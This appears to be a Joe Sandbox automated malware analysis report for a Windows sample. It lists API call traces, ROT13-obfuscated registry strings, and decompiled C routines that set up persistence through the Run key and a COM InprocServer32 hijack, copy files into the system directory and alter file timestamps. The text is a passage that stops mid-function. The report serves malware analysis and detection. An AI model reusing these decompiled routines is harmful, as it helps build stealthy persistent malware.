Part of subcall function 100024A2: rand.MSVCRT ref: 1000257B
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 10002596
Part of subcall function 100024A2: srand.MSVCRT ref: 1000259E
Part of subcall function 100024A2: rand.MSVCRT ref: 100025A3
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 100025BE
Part of subcall function 100024A2: srand.MSVCRT ref: 100025C6
Part of subcall function 100024A2: rand.MSVCRT ref: 100025CB
Part of subcall function 100024A2: GetTickCount.KERNEL32 ref: 100025E6
Part of subcall function 100024A2: srand.MSVCRT ref: 100025EE
Part of subcall function 100024A2: rand.MSVCRT ref: 100025F3
Part of subcall function 100024A2: GetLocalTime.KERNEL32 ref: 10002605
Part of subcall function 100024A2: _itoa.MSVCRT ref: 10002622
Part of subcall function 100024A2: rand.MSVCRT ref: 10002627

Write_REG_SZ.SHERVANS ref: 10002894

Part of subcall function 1000274E: RegOpenKeyExA.ADVAPI32 ref: 1000277E
Part of subcall function 1000274E: RegOpenKeyExA.ADVAPI32 ref: 100027AC
Part of subcall function 1000274E: lstrlen.KERNEL32 ref: 100027BB
Part of subcall function 1000274E: RegSetValueExA.ADVAPI32 ref: 100027E9
Part of subcall function 1000274E: RegCloseKey.ADVAPI32 ref: 100027F7

rot13.SHERVANS ref: 100028AA
add_system_direcroty.SHERVANS ref: 100028C4
filetyt.SHERVANS ref: 100028D2
wsprintfA.USER32 ref: 10002900
CreateFileA.KERNEL32 ref: 10002938
WriteFile.KERNEL32 ref: 1000297F
CloseHandle.KERNEL32 ref: 1000298A
SetFileAttributesA.KERNEL32 ref: 100029A3

Strings

$Q, xrefs: 100028EF
.exe, xrefs: 10002870

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rand$CountTicksrand$Open$CloseFile$LocalTimeValuerot13$AttributesCreateGet_HandleQueryReg_WriteWrite__itoaadd_system_direcrotyfiletytlstrlenrot13csss_ranswsprintf
String ID: $Q$.exe
API String ID: 3664041036-2176984968
Opcode ID: 0ce48c875dcb9776822b96dc49c550283a6cc132f5ca885be87a417cd2aebe61
Instruction ID: 6304da7cd2528330332a3f5809cdbcaba00ebaed1578c57c0e7df17c251e0487
Opcode Fuzzy Hash: 0ce48c875dcb9776822b96dc49c550283a6cc132f5ca885be87a417cd2aebe61
Instruction Fuzzy Hash: CF417CB84087459BE700EF64C58535EBBF4EF84390F50896CE4995B386D7B99A88CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10002A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 62
sleepprocessfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

rot13.SHERVANS ref: 10002A7C

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

add_system_direcroty.SHERVANS ref: 10002A96

Part of subcall function 10002209: memset.MSVCRT ref: 10002226
Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269

rot13.SHERVANS ref: 10002AA6
add_system_direcroty.SHERVANS ref: 10002AC0
Sleep.KERNEL32 ref: 10002AD8
memset.MSVCRT ref: 10002AF3
CreateProcessA.KERNEL32 ref: 10002B5E
CopyFileA.KERNEL32 ref: 10002B83

Strings

D, xrefs: 10002AE0
D, xrefs: 10002AF8
Q, xrefs: 10002A9B

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: add_system_direcrotylstrcatmemsetrot13$CopyCreateDirectoryFileProcessSleepSystemlstrlenrot13c
String ID: D$D$Q
API String ID: 4246308054-1586927259
Opcode ID: 4417ff4c965ab6844378d03f831cbde25bd23026e74690a7ba24f13f1459eb7c
Instruction ID: 487f3aaf9e3853622048ce0787bcf5f21f0a9e41bca69b1cddbbffefc67ddced
Opcode Fuzzy Hash: 4417ff4c965ab6844378d03f831cbde25bd23026e74690a7ba24f13f1459eb7c
Instruction Fuzzy Hash: E731F9B48093159AE710DF20C98539FBBF4FF44794F40885DE88857245E7BAA688CF83

Uniqueness

Uniqueness Score: -1.00%

Function 004054F2 Relevance: 18.1, APIs: 12, Instructions: 107
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00405531

Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 00404FD9
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FE1
Part of subcall function 00404F82: srand.MSVCRT ref: 00404FE9
Part of subcall function 00404F82: rand.MSVCRT ref: 00404FF2
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00404FF9
Part of subcall function 00404F82: srand.MSVCRT ref: 00405001
Part of subcall function 00404F82: rand.MSVCRT ref: 0040500D
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405026
Part of subcall function 00404F82: srand.MSVCRT ref: 0040502E
Part of subcall function 00404F82: rand.MSVCRT ref: 00405033
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040504E
Part of subcall function 00404F82: srand.MSVCRT ref: 00405056
Part of subcall function 00404F82: rand.MSVCRT ref: 0040505B
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 00405076
Part of subcall function 00404F82: srand.MSVCRT ref: 0040507E
Part of subcall function 00404F82: rand.MSVCRT ref: 00405083
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 0040509E
Part of subcall function 00404F82: srand.MSVCRT ref: 004050A6
Part of subcall function 00404F82: rand.MSVCRT ref: 004050AB
Part of subcall function 00404F82: GetTickCount.KERNEL32 ref: 004050C6
Part of subcall function 00404F82: srand.MSVCRT ref: 004050CE
Part of subcall function 00404F82: rand.MSVCRT ref: 004050D3
Part of subcall function 00404F82: GetLocalTime.KERNEL32 ref: 004050E5
Part of subcall function 00404F82: _itoa.MSVCRT ref: 00405102
Part of subcall function 00404F82: rand.MSVCRT ref: 00405107

SetFilePointer.KERNEL32 ref: 00405574
WriteFile.KERNEL32 ref: 0040559A
Sleep.KERNEL32 ref: 004055A9

Part of subcall function 00404F82: rand.MSVCRT ref: 0040513A
Part of subcall function 00404F82: rand.MSVCRT ref: 00405168
Part of subcall function 00404F82: rand.MSVCRT ref: 00405196
Part of subcall function 00404F82: rand.MSVCRT ref: 004051C0
Part of subcall function 00404F82: rand.MSVCRT ref: 004051EF

SetFilePointer.KERNEL32 ref: 004055D4
WriteFile.KERNEL32 ref: 004055FA
Sleep.KERNEL32 ref: 00405609
SetFilePointer.KERNEL32 ref: 00405634
WriteFile.KERNEL32 ref: 0040565A
SetFilePointer.KERNEL32 ref: 0040567D
WriteFile.KERNEL32 ref: 004056AF
CloseHandle.KERNEL32 ref: 004056C0

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: rand$File$CountTicksrand$PointerWrite$LocalSleepTime$CloseCreateHandle_itoa
String ID:
API String ID: 3159365393-0
Opcode ID: de0745b6355624464966b3122e120d1e1f8d0595332210ddc19a5d1648e15264
Instruction ID: 8e21804255f859d75eeaefc39514b6d8a1434258e14ca154f06cca4555a00953
Opcode Fuzzy Hash: de0745b6355624464966b3122e120d1e1f8d0595332210ddc19a5d1648e15264
Instruction Fuzzy Hash: 0341A5B14087019AD700BF29C19935FBFF4BB84358F51892EE8986B282D7798249CF97

Uniqueness

Uniqueness Score: -1.00%

Function 1000237F Relevance: 13.6, APIs: 9, Instructions: 63
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

rot13.SHERVANS ref: 1000239A

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

add_system_direcroty.SHERVANS ref: 100023B4

Part of subcall function 10002209: memset.MSVCRT ref: 10002226
Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269

rot13.SHERVANS ref: 100023CA
rot13.SHERVANS ref: 100023E0
RegOpenKeyExA.ADVAPI32 ref: 1000240A
RegOpenKeyExA.ADVAPI32 ref: 1000243B
lstrlen.KERNEL32 ref: 10002450
RegSetValueExA.ADVAPI32 ref: 10002484
RegCloseKey.ADVAPI32 ref: 10002495

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rot13$Openlstrcatlstrlen$CloseDirectorySystemValueadd_system_direcrotymemsetrot13c
String ID:
API String ID: 2120556822-0
Opcode ID: 438b2a9e79fb397ef7d0b9817d5b90411af66317ef6a23131a517141560c654b
Instruction ID: bdddcc0189fc53d49cb0cefcea4d87ad964771471e55bb7797a486d5498b6d1c
Opcode Fuzzy Hash: 438b2a9e79fb397ef7d0b9817d5b90411af66317ef6a23131a517141560c654b
Instruction Fuzzy Hash: 6D31D7B48083159FE710EF64C98579EFBF4EF45384F40896DE88883246E7759A888F42

Uniqueness

Uniqueness Score: -1.00%

Function 00405776 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00405796
CreateProcessA.KERNEL32 ref: 004057F8
WaitForSingleObject.KERNEL32 ref: 0040581D
CloseHandle.KERNEL32 ref: 0040582B
CloseHandle.KERNEL32 ref: 00405839

Strings

D, xrefs: 0040579B
D, xrefs: 00405783

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWaitmemset
String ID: D$D
API String ID: 1209732917-143366177
Opcode ID: e2f293ddd65cc38ae5e984d70982910eef1ea10c3a02e6e8841cc2a871050653
Instruction ID: a424a9ca423c88ebceb4bf93d4a85606f6dbc14dab7ded7620f51e0c80248426
Opcode Fuzzy Hash: e2f293ddd65cc38ae5e984d70982910eef1ea10c3a02e6e8841cc2a871050653
Instruction Fuzzy Hash: 1D11A4B0904305DBEB00EF69C58935EBBF0BB44318F008A2DE894AB281D3799588CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

CreateFileA.KERNEL32 ref: 00405E5E
ExitProcess.KERNEL32 ref: 00405E7E
CloseHandle.KERNEL32 ref: 00405E9E

Strings

pgszra.rkr, xrefs: 00405DCF, 00405E15
Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha, xrefs: 00405DFF
user32.dll, xrefs: 00405EB4

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$CloseCreateDirectoryExitFileHandleProcessSystemlstrlenmemset
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha$pgszra.rkr$user32.dll
API String ID: 1778546552-2563098034
Opcode ID: d7d64c2d6549dae37b7de272fb7fced938c3fb5e6f3e1c4ca9f739a992c91a64
Instruction ID: 8ce02ae271826c0af2d77be6dc83fb0dca404b62b159729ddab96385648218ed
Opcode Fuzzy Hash: d7d64c2d6549dae37b7de272fb7fced938c3fb5e6f3e1c4ca9f739a992c91a64
Instruction Fuzzy Hash: F3212AB08097049AD710BF21C58538EBBF4AF84358F41897EE9C867281D7BD858C8F96

Uniqueness

Uniqueness Score: -1.00%

Function 00403F24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00403F24(int _a4) {
				void* _v12;
				char _v140;
				void* _v144;
				void* _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				int _v196;
				int _v200;
				int _v204;
				long _t28;
				char* _t36;
				int _t37;
				int _t38;
				void* _t39;
				void* _t41;
				intOrPtr* _t42;

				_t38 = _a4;
				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
				_t36 =  &_v140;
				_v204 = _t36;
				E00404C38();
				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
				_t41 = _t39 - 0xac;
				if(_t28 == 0) {
					L2:
					_v204 = _t38;
					L0040C310();
					_t42 = _t41 - 4;
					_v188 = _t28 + 1;
					_v192 = _t38;
					_v196 = 1;
					_v200 = 0;
					_v204 = 0;
					 *_t42 = _v144; // executed
					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
					 *((intOrPtr*)(_t42 - 0x18)) = _v144;
					RegCloseKey(??);
					_t37 = 1;
				} else {
					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0); // executed
					_t41 = _t41 - 0x24;
					_t37 = 0;
					if(_t28 == 0) {
						goto L2;
					}
				}
				return _t37;
			}

0x00403f2f
0x00403f32
0x00403f3a
0x00403f40
0x00403f43
0x00403f6d
0x00403f72
0x00403f77
0x00403fcf
0x00403fcf
0x00403fd2
0x00403fd7
0x00403fdb
0x00403fdf
0x00403fe3
0x00403feb
0x00403ff3
0x00404001
0x00404004
0x00404012
0x00404015
0x0040401d
0x00403f79
0x00403fbe
0x00403fc3
0x00403fc6
0x00403fcd
0x00000000
0x00000000
0x00403fcd
0x0040402a

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403F6D
RegCreateKeyExA.ADVAPI32 ref: 00403FBE
lstrlen.KERNEL32 ref: 00403FD2
RegSetValueExA.ADVAPI32 ref: 00404004
RegCloseKey.ADVAPI32 ref: 00404015

Strings

PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32, xrefs: 00403F32

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32
API String ID: 2036214137-2655177054
Opcode ID: 2297313f48ad8b5e75c594d751e4000a98a3ca6776ebaf8159479c7c2d1928ac
Instruction ID: 019c3a761b18c338743e8a7ff589e139028416f66cb1f4fe329e007e5a71a312
Opcode Fuzzy Hash: 2297313f48ad8b5e75c594d751e4000a98a3ca6776ebaf8159479c7c2d1928ac
Instruction Fuzzy Hash: FB21E6B08083159BE710EF25C58535ABBF4BB84348F00896EE88897281E77996488F92

Uniqueness

Uniqueness Score: -1.00%

Function 10002C6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

rot13.SHERVANS ref: 10002C88

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

add_system_direcroty.SHERVANS ref: 10002CA2

Part of subcall function 10002209: memset.MSVCRT ref: 10002226
Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269

rot13.SHERVANS ref: 10002CB2
add_system_direcroty.SHERVANS ref: 10002CCC
CopyFileA.KERNEL32 ref: 10002CE0

Strings

Q, xrefs: 10002CA7

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: add_system_direcrotylstrcatrot13$CopyDirectoryFileSystemlstrlenmemsetrot13c
String ID: Q
API String ID: 3463403391-744326856
Opcode ID: d1462803fd1594007a36cfd28d3d3262525f9da5aeb8e3b0d4e208ca5beb545e
Instruction ID: 7dd5af438896393a7b97c0d8831b646f0bd0cf5f1eb72a97525d081a71af1fe0
Opcode Fuzzy Hash: d1462803fd1594007a36cfd28d3d3262525f9da5aeb8e3b0d4e208ca5beb545e
Instruction Fuzzy Hash: 450119B4408715AAD700EF61D9C529EFFB4EF44790F41885DE88847206D775A688CB83

Uniqueness

Uniqueness Score: -1.00%

Function 0040435C Relevance: 9.1, APIs: 6, Instructions: 71filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
GetFileTime.KERNEL32 ref: 004043CD
CloseHandle.KERNEL32 ref: 004043E5
CreateFileA.KERNEL32 ref: 00404423
SetFileTime.KERNEL32 ref: 00404453
CloseHandle.KERNEL32 ref: 00404467

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: d53e2d7dcfffd8f13f9bdb4c7b018601c53aa096df535a78fcbe3ea045a6c83a
Instruction ID: 821c52c15d2594163c2509e09139001ce0ed311c0e70272f4ce7e626a9184330
Opcode Fuzzy Hash: d53e2d7dcfffd8f13f9bdb4c7b018601c53aa096df535a78fcbe3ea045a6c83a
Instruction Fuzzy Hash: B0210AB09083019BE700EF39C59535BBFE4AB84358F008A3DE994973D2E779C648CB96

Uniqueness

Uniqueness Score: -1.00%

Function 10002278 Relevance: 9.1, APIs: 6, Instructions: 59
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E10002278(int _a4) {
				void* _v12;
				char _v140;
				void* _v144;
				void* _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				int _v196;
				int _v200;
				int _v204;
				long _t28;
				char* _t36;
				int _t37;
				int _t38;
				void* _t39;
				void* _t41;
				intOrPtr* _t42;

				_t38 = _a4;
				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
				_t36 =  &_v140;
				_v204 = _t36;
				E10001F26();
				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
				_t41 = _t39 - 0xac;
				if(_t28 == 0) {
					L2:
					_v204 = _t38;
					L10003570();
					_t42 = _t41 - 4;
					_v188 = _t28 + 1;
					_v192 = _t38;
					_v196 = 1;
					_v200 = 0;
					_v204 = 0;
					 *_t42 = _v144; // executed
					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
					 *((intOrPtr*)(_t42 - 0x18)) = _v144; // executed
					RegCloseKey(??); // executed
					_t37 = 1;
				} else {
					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0);
					_t41 = _t41 - 0x24;
					_t37 = 0;
					if(_t28 == 0) {
						goto L2;
					}
				}
				return _t37;
			}

0x10002283
0x10002286
0x1000228e
0x10002294
0x10002297
0x100022c1
0x100022c6
0x100022cb
0x10002323
0x10002323
0x10002326
0x1000232b
0x1000232f
0x10002333
0x10002337
0x1000233f
0x10002347
0x10002355
0x10002358
0x10002366
0x10002369
0x10002371
0x100022cd
0x10002312
0x10002317
0x1000231a
0x10002321
0x00000000
0x00000000
0x10002321
0x1000237e

APIs

rot13.SHERVANS ref: 10002297

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

RegOpenKeyExA.ADVAPI32 ref: 100022C1
RegCreateKeyExA.ADVAPI32 ref: 10002312
lstrlen.KERNEL32 ref: 10002326
RegSetValueExA.ADVAPI32 ref: 10002358
RegCloseKey.ADVAPI32 ref: 10002369

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: CloseCreateOpenValuelstrlenrot13rot13c
String ID:
API String ID: 327323149-0
Opcode ID: 59e43c6821ea99cefc5617d5e071f6ef7f515ecb0e1053861fa941e5bf295870
Instruction ID: 0f2e1fea51bb9d7b4591eaea7ef700760b1debe67a353b116e3d9409648ad131
Opcode Fuzzy Hash: 59e43c6821ea99cefc5617d5e071f6ef7f515ecb0e1053861fa941e5bf295870
Instruction Fuzzy Hash: 2F21D8B48083159BE710EF25D54574FBBF8FB44394F40C96DE88887245E77996488F92

Uniqueness

Uniqueness Score: -1.00%

Function 00403D26 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00403D7B
RegCloseKey.ADVAPI32 ref: 00403D90
RegCreateKeyExA.ADVAPI32 ref: 00403E00
RegCloseKey.ADVAPI32 ref: 00403E15

Strings

Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403D30

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Close$CreateOpen
String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba
API String ID: 1299239824-3858799484
Opcode ID: 48896b124bd474820f71979e4f946ad337c52b0363e5182aa0eb181ed28b56a5
Instruction ID: 372c3b0a06c6ee96941f7226abfc86991cfccc6d41bd2ee5df839bccf0e05334
Opcode Fuzzy Hash: 48896b124bd474820f71979e4f946ad337c52b0363e5182aa0eb181ed28b56a5
Instruction Fuzzy Hash: 502131B0914315CEE710EF35C58579ABBF8BB44308F408A7EE484E7281E779C6888F52

Uniqueness

Uniqueness Score: -1.00%

Function 10002EC6 Relevance: 7.6, APIs: 5, Instructions: 56
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002EC6(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				struct _SECURITY_ATTRIBUTES* _v44;
				struct _SECURITY_ATTRIBUTES* _v48;
				intOrPtr _v52;
				struct _SECURITY_ATTRIBUTES* _v56;
